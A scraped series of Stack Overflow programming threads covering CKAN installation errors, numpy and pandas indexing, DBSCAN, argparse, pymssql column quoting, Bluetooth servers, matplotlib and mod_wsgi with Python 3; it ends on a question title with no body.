<p>i'm trying to install CKAN 2.5.2 on Centos 6.8</p> <p>When i run paster db init -c /etc/ckan/default/development.ini</p> <p>i get error </p> <pre><code>Traceback (most recent call last): File "/usr/lib/ckan/default/bin/paster", line 9, in &lt;module&gt; load_entry_point('PasteScript==2.0.2', 'console_scripts', 'paster')() File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/script/command.py", line 102, in run invoke(command, command_name, options, args[1:]) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/script/command.py", line 141, in invoke exit_code = runner.run(args) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/script/command.py", line 236, in run result = self.command() File "/usr/lib/ckan/default/src/ckan/ckan/lib/cli.py", line 205, in command self._load_config(cmd!='upgrade') File "/usr/lib/ckan/default/src/ckan/ckan/lib/cli.py", line 142, in _load_config conf = self._get_config() File "/usr/lib/ckan/default/src/ckan/ckan/lib/cli.py", line 139, in _get_config return appconfig('config:' + self.filename) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 261, in appconfig global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 296, in loadcontext global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 320, in _loadconfig return loader.get_context(object_type, name, global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 454, in get_context section) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 476, in _context_from_use object_type, name=use, global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 406, in get_context global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 
296, in loadcontext global_conf=global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 328, in _loadegg return loader.get_context(object_type, name, global_conf) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 620, in get_context object_type, name=name) File "/usr/lib/ckan/default/lib/python2.6/site-packages/paste/deploy/loadwsgi.py", line 646, in find_egg_entry_point possible.append((entry.load(), protocol, entry.name)) File "/usr/lib/ckan/default/lib/python2.6/site-packages/pkg_resources/__init__.py", line 2229, in load return self.resolve() File "/usr/lib/ckan/default/lib/python2.6/site-packages/pkg_resources/__init__.py", line 2235, in resolve module = __import__(self.module_name, fromlist=['__name__'], level=0) File "/usr/lib/ckan/default/src/ckan/ckan/config/middleware.py", line 28, in &lt;module&gt; from ckan.config.environment import load_environment File "/usr/lib/ckan/default/src/ckan/ckan/config/environment.py", line 18, in &lt;module&gt; import ckan.lib.helpers as h File "/usr/lib/ckan/default/src/ckan/ckan/lib/helpers.py", line 30, in &lt;module&gt; from bleach import clean as clean_html File "/usr/lib/ckan/default/lib/python2.6/site-packages/bleach/__init__.py", line 8, in &lt;module&gt; from html5lib.sanitizer import HTMLSanitizer ImportError: No module named sanitizer </code></pre> <p>I was following <a href="https://github.com/ckan/ckan/wiki/How-to-install-CKAN-2.5.2-on-CentOS-6.8" rel="nofollow">wiki instructions</a> </p> <p>I'm stuck on this step and don't know how to proceed.</p> <p>Module html5lib is imported and updated to latest version. 
Paster script is executed in virtualenv under root account.</p> <p>Also i'm running all of this in python2.6 since that is default on Centos.</p> <p>Some additional information</p> <p>when i run python and import html5lib and then help(html5lib) i get this</p> <pre><code>&gt;&gt;&gt; import html5lib &gt;&gt;&gt; help(html5lib) Help on package html5lib: NAME html5lib FILE /usr/lib/python2.6/site-packages/html5lib/__init__.py DESCRIPTION HTML parsing library based on the WHATWG "HTML5" specification. The parser is designed to be compatible with existing HTML found in the wild and implements well-defined error recovery that is largely compatible with modern desktop web browsers. Example usage: import html5lib f = open("my_document.html") tree = html5lib.parse(f) PACKAGE CONTENTS _ihatexml _inputstream _tokenizer _trie (package) _utils constants filters (package) html5parser serializer treeadapters (package) treebuilders (package) treewalkers (package) CLASSES __builtin__.object html5lib.html5parser.HTMLParser class HTMLParser(__builtin__.object) | HTML parser. Generates a tree structure from a stream of (possibly | malformed) HTML | | Methods defined here: : </code></pre> <p>There is no sanitizer here. Do i need to use specific version of html5lib? </p> <p>Can anyone help?</p>
2
2016-07-21T08:12:06Z
38,505,591
<p>It looks like you have two copies of html5lib installed. When you ran <code>help(html5lib)</code>, it showed the copy installed in your user's Python directory (/usr/lib/python2.6/site-packages/), not the virtualenv where you have CKAN (and bleach) installed (/usr/lib/ckan/default/lib/python2.6/site-packages/). So get rid of the former to avoid confusion.</p> <p>Yes, I think you have the wrong version of html5lib, since <code>sanitizer</code> is listed in the package contents when I do help.</p> <p>This is the correct version (at the time of writing; in future, check what is in requirements.txt):</p> <pre><code>$ pip freeze | grep html5lib html5lib==0.9999999 </code></pre>
1
2016-07-21T13:27:41Z
[ "python", "centos", "virtualenv", "ckan", "paster" ]
Extracting portions of low-dimensional numpy array into final axes of higher-dimensional array
38,498,654
<p>I have a static shape-<code>(l,l)</code> array <code>C</code>. I want to extract portions of it into some other array <code>K</code>, which has shape <code>(m,m,n,n)</code>. The starting index of what I want to extract from <code>C</code> is given in array <code>i0</code>, which has shape <code>(m,m)</code>.</p> <p>Some element of <code>K</code> will be given by <code>K[i,j,:,:] = C[i0[i,j]:i0[i,j]+n, i0[i,j]:i0[i,j]+n]</code>. So going off some other similar questions it seemed like this might do the job...</p> <pre><code>C[i0[None, None, ...] + np.arange(n)[..., None, None], i0[None, None, ...] + np.arange(n)[..., None, None], I, J] </code></pre> <p>which raises an <code>IndexError</code>. I guess this is because <code>C</code> is only 2D, and the dimensions can't be increased. Though that could easily be fixed by tiling <code>C</code>, <code>C</code> is large, so remaking it <code>m*m</code> times would be rather expensive.</p> <p>So my question is how to extract different (2D) portions of a 2D array into corresponding portions of a 4D array.</p>
1
2016-07-21T08:15:08Z
38,499,028
<p>One way would be with <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.meshgrid.html" rel="nofollow"><code>np.meshgrid</code></a> to create <code>2D</code> indexing meshes corresponding to the window of <code>(n,n)</code> shape, adding those with <code>i0</code> that's extended with two new axes along which broadcasting would take place. Finally, we simply index into <code>C</code> to give us the desired <code>4D</code> output. Thus, one implementation would be like so -</p> <pre><code>N = np.arange(n)
X,Y = np.meshgrid(N,N)
out = C[i0[...,None,None] + Y,i0[...,None,None] + X]
</code></pre> <p>Sample run -</p> <pre><code>In [153]: C
Out[153]:
array([[3, 5, 1, 6, 3, 5, 8, 7, 0, 2],
       [8, 4, 6, 8, 7, 2, 6, 2, 5, 0],
       [3, 7, 7, 7, 3, 4, 4, 6, 7, 6],
       [7, 0, 8, 2, 1, 1, 0, 4, 4, 6],
       [2, 4, 6, 0, 0, 5, 6, 8, 0, 0],
       [4, 6, 1, 0, 5, 6, 2, 1, 7, 4],
       [0, 5, 5, 3, 7, 5, 7, 1, 4, 0],
       [6, 4, 4, 7, 2, 4, 6, 6, 6, 5],
       [5, 2, 3, 2, 2, 5, 4, 5, 2, 5],
       [3, 7, 1, 0, 4, 4, 6, 6, 2, 2]])

In [154]: i0
Out[154]:
array([[1, 0, 4, 4],
       [0, 4, 4, 0],
       [2, 3, 1, 3],
       [2, 2, 0, 4]])

In [155]: n = 3

In [157]: out[0,0,:,:]
Out[157]:
array([[4, 6, 8],
       [7, 7, 7],
       [0, 8, 2]])

In [158]: C[i0[0,0]:i0[0,0]+n,i0[0,0]:i0[0,0]+n]
Out[158]:
array([[4, 6, 8],
       [7, 7, 7],
       [0, 8, 2]])
</code></pre>
1
2016-07-21T08:32:09Z
[ "python", "arrays", "numpy" ]
Data Mining: Clustering of nominal attributes through DBSCAN algo
38,498,686
<p>I want to perform clustering on a data set with DBSCAN algorithm. The problem is that the data has nominal attributes like zipcode and currency. Any idea how to handle these values?</p>
-1
2016-07-21T08:16:32Z
38,520,177
<p>Two options:</p> <ol> <li><p>Define a custom distance function that handles these attributes as desired. For example with zip codes, you will want to look up proximity.</p></li> <li><p>Use Generalized DBSCAN and define a custom neighbor predicate. It could require e.g. zip codes to be neighbors <em>and</em> attribute values to be similar.</p></li> </ol> <p>Don't use one-hot encoding on zip codes. That does not make much sense. You might as well use Hamming distance on the categorical attributes, which is more efficient (see option 1).</p>
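To make option 1 concrete, here is a minimal sketch of such a custom distance function. It assumes each record is a tuple whose first entries are numeric and whose remaining entries (e.g. zipcode, currency) are nominal; the nominal part is compared with Hamming distance. The column split and the weight are hypothetical and would need tuning for your data. A callable like this can be passed as the `metric` argument of scikit-learn's `DBSCAN`, or used in any DBSCAN implementation that accepts a custom distance.

```python
def mixed_distance(a, b, n_numeric=2, nominal_weight=1.0):
    """Distance between two records mixing numeric and nominal attributes.

    a, b           -- tuples/lists; the first n_numeric entries are numbers,
                      the rest are nominal values (e.g. zipcode, currency).
    nominal_weight -- hypothetical weight balancing the two parts.
    """
    # Euclidean distance on the numeric part
    numeric = sum((x - y) ** 2 for x, y in zip(a[:n_numeric], b[:n_numeric])) ** 0.5
    # Hamming distance on the nominal part: count of attributes that differ
    nominal = sum(x != y for x, y in zip(a[n_numeric:], b[n_numeric:]))
    return numeric + nominal_weight * nominal

# two hypothetical customer records: (amount, age, zipcode, currency)
r1 = (10.0, 30, "10115", "EUR")
r2 = (13.0, 34, "10115", "USD")
print(mixed_distance(r1, r2))  # -> 6.0 (numeric part 5.0, one nominal mismatch)
```

Note that zipcodes treated this way only capture equality, not geographic proximity; mapping zipcodes to coordinates first (as option 1 suggests) would be more faithful.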
0
2016-07-22T07:03:11Z
[ "python", "cluster-analysis", "data-mining" ]
execute script from within python3 interpreter and show interpreter results
38,498,690
<p>I am working inside the python 3 interpreter, and I want to use it for homework.</p> <p>first, I have a library called <code>mylibrary.py</code> like this</p> <pre><code>from math import pi

def area_circle(r):
    return (r*r*pi)
</code></pre> <p>Second, I have a script called <code>homework.py</code> like this</p> <pre><code>from mylibrary import *

area_circle(3)
area_circle(5)
area_circle(3) + area_circle(5)
</code></pre> <p>Now, I want to enter the python interpreter and somehow execute the script <code>homework.py</code> as if I had typed these lines directly into the interpreter, and I want the results to appear on the screen as the interpreter normally displays them.</p> <p>from the BASH prompt:</p> <pre><code>$python3
Python 3.4.3 (default, Oct 14 2015, 20:28:29)
[GCC 4.8.4] on linux
Type "help", "copyright", "credits" or "license" for more information.
&gt;&gt;&gt; exec "homework"
</code></pre> <p>Is there such a command? I want it to read my script and enter the lines into the interpreter, so that what appears on the screen next is:</p> <pre><code>&gt;&gt;&gt; from mylibrary import *
&gt;&gt;&gt; area_circle(3)
28.274333882308138
&gt;&gt;&gt; area_circle(5)
78.53981633974483
&gt;&gt;&gt; area_circle(3) + area_circle(5)
106.81415022205297
</code></pre> <p>Please note that I do not have <code>Idle</code>, i do not have <code>iPython</code>, I just have the interpreter which I access from the BASH prompt. </p> <p>I know that I could replace the functions in the library to explicitly call the print function, something like this:</p> <pre><code>def area_circle(r):
    a=r*r*pi
    print(a)
    return()
</code></pre> <p>But I don't want that, as it would prevent me from using this function as a building block of future functions.<br> So I guess what I'm asking is how to execute the <code>homework</code> script line by line into the interpreter, in the simplest way possible.</p>
-1
2016-07-21T08:16:45Z
38,499,370
<p>You can't show the content without using 'print' when you're not at the interactive Python prompt.</p> <p>You can modify your function, so it prints if a second argument is given, and doesn't print otherwise : </p> <pre><code>def area_circle(r, do_print=False):
    a = r*r*pi
    if do_print:
        print(a)
    return a
</code></pre> <p>This function will return the area in all cases. It will also print its value if you give it <code>True</code> as a second argument (<code>area_circle(3)</code> prints nothing and returns the area, while <code>area_circle(3,True)</code> prints the area, and also returns its value)</p>
0
2016-07-21T08:48:11Z
[ "python", "python-3.x", "exec", "interpreter" ]
Split pandas column and add last element to a new column
38,498,718
<p>I have a pandas dataframe containing (besides other columns) full names:</p> <pre><code>fullname
martin master
andreas test
</code></pre> <p>I want to create a new column which splits the fullname column along the blank space and assigns the last element to a new column. The result should look like:</p> <pre><code>fullname        lastname
martin master   master
andreas test    test
</code></pre> <p>I thought it would work like this:</p> <pre><code>df['lastname'] = df['fullname'].str.split(' ')[-1]
</code></pre> <p>However, I get a <code>KeyError: -1</code></p> <p>I use <code>[-1]</code>, that is the last element of the split group, in order to be sure that I get the real last name. In some cases (e.g. a name like <em>andreas martin master</em>), this helps to get the last name, that is, <em>master</em>.</p> <p>So how can I do this?</p>
3
2016-07-21T08:18:14Z
38,498,755
<p>You need another <code>str</code> to access the last splits for every row, what you did was essentially try to index the series using a non-existent label:</p> <pre><code>In [31]: df['lastname'] = df['fullname'].str.split().str[-1]

df
Out[31]:
        fullname lastname
0  martin master   master
1   andreas test     test
</code></pre>
4
2016-07-21T08:19:40Z
[ "python", "pandas", "split" ]
Split pandas column and add last element to a new column
38,498,718
<p>I have a pandas dataframe containing (besides other columns) full names:</p> <pre><code>fullname
martin master
andreas test
</code></pre> <p>I want to create a new column which splits the fullname column along the blank space and assigns the last element to a new column. The result should look like:</p> <pre><code>fullname        lastname
martin master   master
andreas test    test
</code></pre> <p>I thought it would work like this:</p> <pre><code>df['lastname'] = df['fullname'].str.split(' ')[-1]
</code></pre> <p>However, I get a <code>KeyError: -1</code></p> <p>I use <code>[-1]</code>, that is the last element of the split group, in order to be sure that I get the real last name. In some cases (e.g. a name like <em>andreas martin master</em>), this helps to get the last name, that is, <em>master</em>.</p> <p>So how can I do this?</p>
3
2016-07-21T08:18:14Z
38,499,006
<p>If you need to create 2 new columns, use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.str.rsplit.html" rel="nofollow"><code>str.rsplit</code></a> with parameter <code>n=1</code>. If you need only the last column, <a href="http://stackoverflow.com/a/38498755/2901002"><code>EdChum</code></a>'s solution is better:</p> <pre><code>print (df)
                fullname
0          martin master
1           andreas test
2  andreas martin master

df[['first_name','last_name']] = df['fullname'].str.rsplit(expand=True, n=1)
print (df)
                fullname      first_name last_name
0          martin master          martin    master
1           andreas test         andreas      test
2  andreas martin master  andreas martin    master
</code></pre>
1
2016-07-21T08:30:55Z
[ "python", "pandas", "split" ]
read_sql_query returns far more records than actual table rows
38,498,960
<p>I am trying to get a postgresql table into a python data frame. But the dataframe size is extremely larger than the actual number of table records even though I specified an index column. What's causing this issue? Single quotes/ commas in the database table?</p> <pre><code>import psycopg2 as pg
import pandas.io.sql as psql

connection = pg.connect("dbname=BeaconDB user=admin password=root")
dataframe = psql.read_sql_query(sql="SELECT * from encounters2", con=connection, index_col='encounter_id')
print('size::::', dataframe.size)
</code></pre>
0
2016-07-21T08:29:11Z
38,499,155
<p><a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.size.html" rel="nofollow">df.size</a> shows you the number of elements (cells) in the DF</p> <p>Demo:</p> <pre><code>In [134]: df
Out[134]:
   A   B
0  3  11
1  0   2

In [135]: df.size
Out[135]: 4

In [136]: df.shape
Out[136]: (2, 2)

In [137]: len(df)
Out[137]: 2

In [138]: len(df.index)
Out[138]: 2
</code></pre>
0
2016-07-21T08:37:41Z
[ "python", "postgresql", "pandas" ]
Matplotlib custom style error
38,498,981
<p>I am trying to set the plotting style in matplotlib:</p> <blockquote> <p>import pandas as pd</p> <p>import matplotlib</p> <p>print matplotlib.<strong>version</strong></p> <p>matplotlib.style.use('ggplot')</p> </blockquote> <p>Output:</p> <blockquote> <p>1.5.1</p> <p>AttributeError: 'module' object has no attribute 'style'</p> </blockquote> <p>So the version of my matplotlib is > 1.4 but style still doesnt work. I did confirm that the style folder is in <code>site-packages</code>.</p> <p>Any help would be appreciated. Thanks</p>
0
2016-07-21T08:23:59Z
38,499,121
<p>Try this:</p> <pre><code>%matplotlib inline
import pandas as pd
import matplotlib
print matplotlib.__version__
matplotlib.style.use('ggplot')
</code></pre>
0
2016-07-21T08:36:16Z
[ "python" ]
--debug command line argument in Python
38,499,158
<p>When I introduce the "--debug" argument on the command line I need to set the variable "debug" in my python script to the value 1.</p> <p>I've tried something, but I have to write "--debug=1" on the command line to set the variable.</p> <pre><code>parser = argparse.ArgumentParser()
parser.add_argument("--debug", default=2)
</code></pre> <p>When I run the command:</p> <pre><code>python script.py --rev1=1.2 --rev2=1.5 --debug
</code></pre> <p>my variable "debug" should have value 1.</p>
0
2016-07-21T08:37:47Z
38,499,244
<p>If you're interested in knowing whether a certain command line flag has been passed to your script, you'd set the <a href="https://docs.python.org/3/library/argparse.html#action" rel="nofollow"><code>action</code></a> argument of <code>ArgumentParser.add_argument</code> to <code>store_true</code>.</p> <pre><code>parser.add_argument('--debug', action='store_true')
</code></pre> <p>Then <code>parser.parse_args().debug</code> will have the value of <code>True</code> if <code>--debug</code> was present and <code>False</code> otherwise.</p> <pre><code>$ python script.py
parser.parse_args() returned Namespace(debug=False)
$ python script.py --debug
parser.parse_args() returned Namespace(debug=True)
</code></pre>
0
2016-07-21T08:42:13Z
[ "python", "command", "argparse" ]
Best way to prevent sql "injection" when using column as variable
38,499,201
<p>I'm using pymssql to Update, Drop, and Add columns to a MS SQL server. the columns are sadly variables set by external sources such as reading the database, reading from another database. Now i'm trying to prevent "bad" sql to get through as i don't know exactly what the other database gives me. </p> <pre><code>'ALTER TABLE tablenameA ADD [' + columnname + '] varchar(25) NULL'
'ALTER TABLE tablenameA DROP COLUMN ['+columnname+']'
('UPDATE tablenameA SET [' + columnname + ']=%s WHERE id = 2', value)
</code></pre> <p>Now i can't use a whitelist as i don't know what column names is to be added, my only other option i can think of is to use a blacklist, but i was wondering if there maybe exists a third option. </p> <p>(The column names are gotten from a column in a table with type string)</p>
0
2016-07-21T08:40:13Z
38,499,740
<p>Transact-SQL has a function to turn a SQL string into a safe object name: <a href="https://msdn.microsoft.com/en-us/library/ms176114.aspx" rel="nofollow"><code>QUOTENAME()</code></a>. Use it around a bind parameter to have the database driver provide a properly quoted SQL object:</p> <pre><code>cursor.execute('SELECT QUOTENAME(%s)', (columnname,))
quoted_columnname, = next(cursor)
</code></pre> <p>Now you can use <em>that</em> string in a new query:</p> <pre><code>query = 'ALTER TABLE tablenameA ADD {} varchar(25) NULL'.format(quoted_columnname)
</code></pre> <p>etc. I used <code>str.format()</code> to insert the string here, rather than use string concatenation. Note that the <code>[...]</code> square brackets are no longer needed; <code>QUOTENAME()</code> took care of that.</p>
1
2016-07-21T09:06:55Z
[ "python", "sql-server", "sql-injection", "pymssql" ]
How to block and wait for async, callback based Python function calls
38,499,261
<p>I have a Python script that makes many async requests. The API I'm using takes a callback.</p> <p>The main function calls run and I want it to block execution until all the requests have come back.</p> <p>What could I use within Python 2.7 to achieve this?</p> <pre><code>def run():
    for request in requests:
        client.send_request(request, callback)

def callback(error, response):
    # handle response
    pass

def main():
    run()
    # I want to block here
</code></pre> <p>Thanks!</p>
1
2016-07-21T08:42:55Z
38,502,488
<p>I found that the simplest, least invasive way is to use <code>threading.Event</code>, available in 2.7.</p> <pre><code>import threading
import functools

def run():
    events = []
    for request in requests:
        event = threading.Event()
        callback_with_event = functools.partial(callback, event)
        client.send_request(request, callback_with_event)
        events.append(event)
    return events

def callback(event, error, response):
    # handle response
    event.set()

def wait_for_events(events):
    for event in events:
        event.wait()

def main():
    events = run()
    wait_for_events(events)
</code></pre>
1
2016-07-21T11:01:32Z
[ "python", "asynchronous", "callback" ]
How can I pull information from Excel into PowerPoint using Python and keep the format?
38,499,294
<p>I've written a script with python's xlrd and pptx to read each workbook in a directory and pull information from each sheet into a table in a PowerPoint slide. It works okay if the excel table is small but I don't know what will be in these excel files. It becomes illegible when there is too many rows and columns. My main problem arose when an excel file had graphs instead of cells and the script couldn't read it. So I tried using pyscreenshot to open the document and take a screenshot but this seems slow and unnecessary. I'd like to make a slide in the PowerPoint look exactly as it would in excel but with the ability to add and change things. </p> <pre><code>import libraries and modules import xlrd from pptx import Presentation from pptx.util import Inches, Pt import time import glob import os start = time.time() prs = Presentation() title_slide_layout = prs.slide_layouts[0] slide = prs.slides.add_slide(title_slide_layout) shapes = slide.shapes title = slide.shapes.title subtitle = slide.placeholders[1] title.text = "Dashboard Generator" subtitle.text = "made with Python-pptx and xlrd" for filename in glob.glob(os.path.join("C:/Users/penelope/Desktop/PMO/myfiles/", '*.xlsx')): print(filename) file_location = filename try: workbook = xlrd.open_workbook(file_location) nsheets = workbook.nsheets for n in range(0, nsheets): sheet = workbook.sheet_by_index(n) print("sheet:", sheet) rows = sheet.nrows cols = sheet.ncols c = cols r = rows if c &gt; 0: print(c, r) slide = prs.slides.add_slide(prs.slide_layouts[5]) shapes = slide.shapes title = slide.shapes.title title.text = "Table testing" left = Inches(0.0) top = Inches(2.0) width = Inches(6.0) height = Inches(4.0) num = 10.0/c table = shapes.add_table(rows, cols, left, top, width, height).table for i in range(0, c): table.columns[i].width = Inches(num) for i in range(0,r): for e in range(0,c): table.cell(i,e).text = str(sheet.cell_value(i,e)) cell = table.rows[i].cells[e] paragraph = cell.text_frame.paragraphs[0] 
paragraph.font.size = Pt(11) except: print("Error!") pass prs.save('powerpointfile1.pptx') end = time.time() print(end - start) </code></pre> <p>And this is my screenshot script:</p> <pre><code>import os import time import pyscreenshot as ImageGrab from PIL import Image if __name__ == "__main__": os.system('start excel.exe "C:/Users/penelope/Desktop/PMO/TestCase.xlsx"') time.sleep(3) im=ImageGrab.grab(bbox=(24,210,1800,990)) im.save("image7.png") img = Image.open('image7.png') img.show() </code></pre>
0
2016-07-21T08:44:35Z
38,515,889
<p>Well, you've chosen a hard problem. Certainly all the times I've attempted this sort of thing I've ended up abandoning the effort.</p> <p>The fundamental explanation I formed was that Excel (and Word) are "flowed" document environments. That is, when you run out of room on one page, it flows to the next. PowerPoint, on the other hand, is a page-by-page exhibit layout environment. Each slide is independent of the rest (evidenced by the ability to reorder slides freely), each meant to be shown all at once, and not scrolled. This leads to each slide being self-contained, which means constrained to a single "page".</p> <p>There's a limit to how much information one can place on a slide and still have it communicate. Generally less is better. So, perhaps it's not a surprise all my early efforts there ended in frustration :) I also concluded that an effective "dashboard" slide would require very skillful layout, and extreme restraint on content length, probably requiring specific (human) summarization effort (not just copying from a "database").</p> <p>Regarding the charts bit, those theoretically can be moved to PowerPoint and I've even seen it done, but it's technically quite challenging. There is no API support for it in python-pptx. <a href="https://github.com/scanny/python-pptx/pull/65" rel="nofollow">This historical issue on the GitHub repo</a> may give some idea what was involved. Not for the faint of heart I expect :)</p>
0
2016-07-21T23:21:22Z
[ "python", "excel", "powerpoint" ]
python Bluetooth error - No module named _bluetooth
38,499,342
<p>I am trying an example code in python which works as a bluetooth server. This code gives following error..</p> <p>Traceback (most recent call last): File "/var/lib/cloud9/examples/Sa/rfcomm-server_py", line 7, in from bluetooth import * File "/var/lib/cloud9/examples/Sa/bluetooth/<strong>init</strong>.py", line 43, in from .bluez import * File "/var/lib/cloud9/examples/Sa/bluetooth/bluez.py", line 6, in import _bluetooth as _bt ImportError: No module named _bluetooth</p> <p>I am using beaglebone green wireless board in cloud9 IDE</p> <pre><code> # file: rfcomm-server.py # auth: Albert Huang &lt;albert@csail.mit.edu&gt; # desc: simple demonstration of a server application that uses RFCOMM sockets # $Id: rfcomm-server.py 518 2007-08-10 07:20:07Z albert $ from bluetooth import * server_sock=BluetoothSocket( RFCOMM ) server_sock.bind(("",PORT_ANY)) server_sock.listen(1) port = server_sock.getsockname()[1] uuid = "94f39d29-7d6d-437d-973b-fba39e49d4ee" advertise_service( server_sock, "SampleServer", service_id = uuid, service_classes = [ uuid, SERIAL_PORT_CLASS ], profiles = [ SERIAL_PORT_PROFILE ], # protocols = [ OBEX_UUID ] ) print("Waiting for connection on RFCOMM channel %d" % port) client_sock, client_info = server_sock.accept() print("Accepted connection from ", client_info) try: while True: data = client_sock.recv(1024) if len(data) == 0: break print("received [%s]" % data) except IOError: pass print("disconnected") client_sock.close() server_sock.close() print("all done") </code></pre>
0
2016-07-21T08:47:14Z
38,501,457
<p>I didn't turn on the bluetooth on Beaglebone green wireless board, but after running the following command, the code above worked perfectly:</p> <pre><code>$ bb-wl18xx-bluetooth </code></pre>
0
2016-07-21T10:17:10Z
[ "python", "bluetooth", "cloud9-ide", "beagleboard" ]
How to display a binary state (ON/OFF) in Matplotlib?
38,499,347
<p>I have built a GUI with matplotlib and it contains several plots of values versus time. Now I need a special plot which just shows if a value is on or off (binary state).</p> <p>Kinda like a control lamp on an analog control panel. I have 5 of those on/off values and I dont know how to do it the best way. </p> <p>The "lamps" must be updateable because I stream the data from serial and analyze it in real time in my GUI.</p> <p>I attached a picture where you see my current GUI. In the bottom right corner is now a bar chart, I tried to visualize the ON/OFF state with a bar, but it didn't work well and I wasn't able to animate it.</p> <p><a href="http://i.stack.imgur.com/uFh8u.png" rel="nofollow"><img src="http://i.stack.imgur.com/uFh8u.png" alt="enter image description here"></a></p> <p>So yeah, how could I display 5 values with each an ON/OFF state in that area?</p>
0
2016-07-21T08:47:23Z
38,500,368
<p>Instead of going via bar charts, I would directly plot a number of rectangles and then dynamically change their color.</p> <p>You can find the documentation for rectangular patches here: <a href="http://matplotlib.org/api/patches_api.html#matplotlib.patches.Rectangle" rel="nofollow">http://matplotlib.org/api/patches_api.html#matplotlib.patches.Rectangle</a></p> <p>If you need some pointers on how to animate such a patch have a look here: <a href="https://nickcharlton.net/posts/drawing-animating-shapes-matplotlib.html" rel="nofollow">https://nickcharlton.net/posts/drawing-animating-shapes-matplotlib.html</a></p>
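A minimal sketch of that idea (the five signal names, the colors, and the layout below are made up for illustration; the exact redraw call depends on how your GUI embeds matplotlib): create one Rectangle patch per signal once, then on every new serial sample just recolor the patches and redraw.

```python
import matplotlib
matplotlib.use("Agg")  # headless backend for this sketch; your GUI uses its own
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle

LAMP_NAMES = ["valve", "pump", "heater", "fan", "alarm"]  # hypothetical signals
ON, OFF = "limegreen", "lightgray"

def make_lamps(ax, names):
    """Create one rectangle per signal and return them keyed by name."""
    lamps = {}
    for i, name in enumerate(names):
        rect = Rectangle((i * 1.2, 0), 1.0, 1.0, facecolor=OFF, edgecolor="black")
        ax.add_patch(rect)
        ax.text(i * 1.2 + 0.5, -0.3, name, ha="center")
        lamps[name] = rect
    ax.set_xlim(-0.5, len(names) * 1.2)
    ax.set_ylim(-1, 2)
    ax.axis("off")
    return lamps

def update_lamps(lamps, states):
    """states maps name -> bool; recolor the patches accordingly."""
    for name, on in states.items():
        lamps[name].set_facecolor(ON if on else OFF)

fig, ax = plt.subplots()
lamps = make_lamps(ax, LAMP_NAMES)
update_lamps(lamps, {"valve": True, "pump": False, "heater": True,
                     "fan": False, "alarm": False})
fig.canvas.draw_idle()  # in the live GUI, redraw after each serial update
```

Since only the face colors change between updates, this stays cheap enough to call on every incoming sample.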
0
2016-07-21T09:32:13Z
[ "python", "matplotlib" ]
How can Apache use Py3 instesd of Py2?
38,499,444
<p>How can Apache use Python/3.x instesd of Python/2.x ?</p> <p>I'm now trying to set up Django application on server with Py3. The command <code>python manage.py runserver</code> was successful. Then I tried to use <code>Apache</code> and <code>mod_wsgi</code> but I got <code>Internal Server Error</code>.</p> <p>The error logs said that</p> <pre><code>[mpm_prefork:notice] [pid 30732] AH00163: Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python/2.7.5 configured -- resuming normal operations </code></pre> <p>but the default python was Py3.</p> <pre><code># python -V Python 3.5.1 </code></pre> <p>I wondered the error would be fixed when apache use Py3. How about you? How can I specify Py3?</p> <h1>Start command</h1> <pre><code># /etc/init.d/httpd restart </code></pre> <h1>Full error logs</h1> <pre><code>$ tailf /etc/httpd/logs/error_log [Thu Jul 21 15:32:20.626731 2016] [auth_digest:notice] [pid 30732] AH01757: generating secret for digest authentication ... [Thu Jul 21 15:32:20.627378 2016] [lbmethod_heartbeat:notice] [pid 30732] AH02282: No slotmem from mod_heartmonitor [Thu Jul 21 15:32:20.629557 2016] [mpm_prefork:notice] [pid 30732] AH00163: Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python/2.7.5 configured -- resuming normal operations [Thu Jul 21 15:32:20.629580 2016] [core:notice] [pid 30732] AH00094: Command line: '/usr/sbin/httpd' [Thu Jul 21 15:37:31.940196 2016] [mpm_prefork:notice] [pid 30732] AH00169: caught SIGTERM, shutting down [Thu Jul 21 15:37:31.981414 2016] [suexec:notice] [pid 30777] AH01232: suEXEC mechanism enabled (wrapper: /usr/sbin/suexec) [Thu Jul 21 15:37:31.993034 2016] [auth_digest:notice] [pid 30778] AH01757: generating secret for digest authentication ... 
[Thu Jul 21 15:37:31.993935 2016] [lbmethod_heartbeat:notice] [pid 30778] AH02282: No slotmem from mod_heartmonitor [Thu Jul 21 15:37:31.996832 2016] [mpm_prefork:notice] [pid 30778] AH00163: Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python/2.7.5 configured -- resuming normal operations [Thu Jul 21 15:37:31.996866 2016] [core:notice] [pid 30778] AH00094: Command line: '/usr/sbin/httpd' </code></pre> <h1>environment</h1> <pre><code>Apache/2.4.6 (CentOS) mod_wsgi/3.4 Python 3.5.1 Django 1.9 CentOS 7.1 </code></pre>
1
2016-07-21T08:51:49Z
38,540,742
<p>If you're using compiled <strong>mod_wsgi</strong>, you need to compile it against the appropriate Python binary for the version you want to use, or it'll default to the system Python version (still typically 2.x, unfortunately). For example:</p> <pre><code>wget -q "https://github.com/GrahamDumpleton/mod_wsgi/archive/4.4.21.tar.gz"
tar -xzf '4.4.21.tar.gz'
cd ./mod_wsgi-4.4.21
./configure --with-python=/usr/local/bin/python3.5
make
make install
</code></pre> <p>Good luck!</p>
0
2016-07-23T10:28:48Z
[ "python", "django", "apache", "mod-wsgi" ]
how to retrieve every section by 3X3?
38,499,475
